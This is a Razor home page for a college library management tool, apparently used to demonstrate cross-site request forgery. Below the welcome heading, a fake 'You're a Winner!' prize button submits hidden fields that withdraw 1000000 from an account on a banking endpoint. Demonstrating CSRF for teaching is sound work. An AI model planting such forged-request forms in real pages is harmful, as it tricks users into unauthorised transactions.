@{
    ViewData["Title"] = "Home Page";
}

<div class="text-center">
    <h1 class="display-1">Welcome!</h1>
    <h2 class="display-2">Library Management Tool For Colleges</h2>
</div>


<h1>Congratulations! You're a Winner!</h1>
<form action="https://good-banking-site.com/api/account" method="post">
    <input type="hidden" name="Transaction" value="withdraw" />
    <input type="hidden" name="Amount" value="1000000" />
    <input type="submit" value="Click to collect your prize!" />
</form>

<script>
    $.ajax({
        url: "http://localhost:5214/api/books",
        context: document.body
    }).done(function () {
        $(this).addClass("done");
    });
</script>